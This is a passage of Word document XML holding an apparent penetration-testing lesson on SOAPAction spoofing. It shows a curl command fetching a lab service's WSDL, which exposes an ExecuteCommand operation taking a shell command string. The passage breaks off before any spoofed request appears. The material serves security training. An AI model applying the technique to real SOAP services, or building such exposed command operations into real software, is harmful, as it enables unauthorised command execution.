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E403" w14:textId="5F9ABF60" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOAPAction Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C258257" w14:textId="6C11767A" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="00F375C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1B9767" w14:textId="740D15DE" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOAP messages towards a SOAP service should include both the operation and the related parameters. This operation resides in the first child element of the SOAP message's body. If HTTP is the transport of choice, it is allowed to use an additional HTTP header called SOAPAction, which contains the operation's name. The receiving web service can identify the operation within the SOAP body through this header without parsing any XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395B8D5C" w14:textId="4B8CB818" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If a web service considers only the SOAPAction attribute when determining the operation to execute, then it may be vulnerable to SOAPAction spoofing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C577D" w14:textId="09B93145" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Let us assess together a SOAP service that is vulnerable to SOAPAction spoofing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC6C1FE" w14:textId="0A103857" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Proceed to the end of this section and click on Click here to spawn the target system! or the Reset Target icon. Use the provided Pwnbox or a local VM with the supplied VPN key to reach the target web service and follow along.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6B189F" w14:textId="1B6F117B" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Suppose we are assessing a SOAP web service, whose WSDL file resides in </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="00552567">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:3002/wsdl?wsdl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B29AA65" w14:textId="15DFF49B" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The service's WSDL file can be found below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226948D1" w14:textId="1C3C900F" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">yovecio@htb[/htb]$ curl </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="00552567">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:3002/wsdl?wsdl </w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;wsdl:definitions targetNamespace="http://tempuri.org/" </w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  xmlns:s="http://www.w3.org/2001/XMLSchema" </w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  xmlns:soap12="http://schemas.xmlsoap.org/wsdl/soap12/" </w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  xmlns:http="http://schemas.xmlsoap.org/wsdl/http/" </w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/" </w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  xmlns:tns="http://tempuri.org/" </w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" </w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" </w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" </w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"&gt;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&lt;wsdl:types&gt;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&lt;s:schema elementFormDefault="qualified" targetNamespace="http://tempuri.org/"&gt;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 name="LoginRequest"&gt;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&lt;s:element minOccurs="1" maxOccurs="1" name="username" type="s:string"/&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;s:element minOccurs="1" maxOccurs="1" name="password" type="s:string"/&gt;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;s:element name="LoginResponse"&gt;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&lt;s:element minOccurs="1" maxOccurs="unbounded" name="result" type="s:string"/&gt;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&lt;/s:element&gt;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 name="ExecuteCommandRequest"&gt;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&lt;s:element minOccurs="1" maxOccurs="1" name="cmd" type="s:string"/&gt;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 name="ExecuteCommandResponse"&gt;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&lt;s:element minOccurs="1" maxOccurs="unbounded" name="result" type="s:string"/&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;/s:sequence&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/s:complexType&gt;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&lt;/s:element&gt;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&lt;/s:schema&gt;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&lt;/wsdl:types&gt;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Login Messages --&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;wsdl:message name="LoginSoapIn"&gt;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&lt;wsdl:part name="parameters" element="tns:LoginRequest"/&gt;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 name="LoginSoapOut"&gt;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&lt;wsdl:part name="parameters" element="tns:LoginResponse"/&gt;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ExecuteCommand Messages --&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;wsdl:message name="ExecuteCommandSoapIn"&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;wsdl:part name="parameters" element="tns:ExecuteCommandRequest"/&gt;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 name="ExecuteCommandSoapOut"&gt;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&lt;wsdl:part name="parameters" element="tns:ExecuteCommandResponse"/&gt;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&lt;/wsdl:message&gt;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&lt;wsdl:portType name="HacktheBoxSoapPort"&gt;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Login Operaion | PORT --&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;wsdl:operation name="Login"&gt;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&lt;wsdl:input message="tns:LoginSoapIn"/&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;wsdl:output message="tns:LoginSoapOut"/&gt;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&lt;/wsdl:operation&gt;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ExecuteCommand Operation | PORT --&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;wsdl:operation name="ExecuteCommand"&gt;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&lt;wsdl:input message="tns:ExecuteCommandSoapIn"/&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;wsdl:output message="tns:ExecuteCommandSoapOut"/&gt;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&lt;/wsdl:operation&gt;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&lt;/wsdl:portType&gt;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&lt;wsdl:binding name="HacktheboxServiceSoapBinding" type="tns:HacktheBoxSoapPort"&gt;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&lt;soap:binding transport="http://schemas.xmlsoap.org/soap/http"/&gt;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SOAP Login Action --&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;wsdl:operation name="Login"&gt;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&lt;soap:operation soapAction="Login" style="document"/&gt;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&lt;wsdl:input&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;soap:body use="literal"/&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/wsdl:input&gt;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&lt;wsdl:output&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;soap:body use="literal"/&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      &lt;/wsdl:output&gt;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&lt;/wsdl:operation&gt;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 SOAP ExecuteCommand Action --&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;wsdl:operation name="ExecuteCommand"&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;soap:operation soapAction="ExecuteCommand" style="document"/&gt;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&lt;wsdl:input&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;soap:body use="literal"/&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/wsdl:input&gt;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&lt;wsdl:output&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;soap:body use="literal"/&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/wsdl:output&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/wsdl:operation&gt;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&lt;/wsdl:binding&gt;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&lt;wsdl:service name="HacktheboxService"&gt;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&lt;wsdl:port name="HacktheboxServiceSoapPort" binding="tns:HacktheboxServiceSoapBinding"&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;soap:address location="http://localhost:80/wsdl"/&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/wsdl:port&gt;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&lt;/wsdl:service&gt;</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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/wsdl:definitions&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00552567" w:rsidRPr="00552567">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E27C397" w14:textId="4AAF80B9" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The first thing to pay attention to is the following.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0285869A" w14:textId="31E37E3E" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552567">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code: xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1756F0DF" w14:textId="489DF43F" w:rsidR="00F375C0" w:rsidRPr="00552567" w:rsidRDefault="4299D736" w:rsidP="4299D736">
      <w:pPr>
